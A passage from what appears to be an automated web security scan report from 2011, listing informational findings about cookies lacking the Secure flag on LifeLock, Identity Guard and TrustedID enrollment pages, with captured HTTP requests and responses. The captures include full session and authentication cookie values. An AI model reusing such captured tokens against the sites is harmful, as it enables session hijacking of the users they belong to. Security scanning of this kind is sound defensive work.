Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

10.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


10.5. https://secure.lifelock.com/enrollment

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

10.6. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

10.7. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

10.8. https://secure.lifelock.com/scripts/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

10.9. https://secure.lifelock.com/styles/login.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

10.10. https://secure.lifelock.com/styles/theme-lifelock.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

10.11. https://secure.lifelock.com/styles/webstore.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

10.12. https://www.trustedid.com/idfide01/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...

10.13. https://www.trustedid.com/suzeidprotector/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
